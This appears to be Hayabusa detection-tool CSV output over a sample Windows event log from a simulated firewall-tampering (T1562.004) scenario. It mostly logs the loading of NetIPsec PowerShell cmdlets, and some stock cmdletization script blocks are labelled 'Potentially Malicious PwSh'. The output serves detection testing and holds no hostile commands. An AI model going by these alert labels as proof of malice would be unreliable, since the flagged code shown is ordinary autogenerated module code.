Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.228 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.229 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.229 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.233 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.276 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.276 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.277 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.277 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.280 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.281 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.282 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.285 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.286 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.286 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = 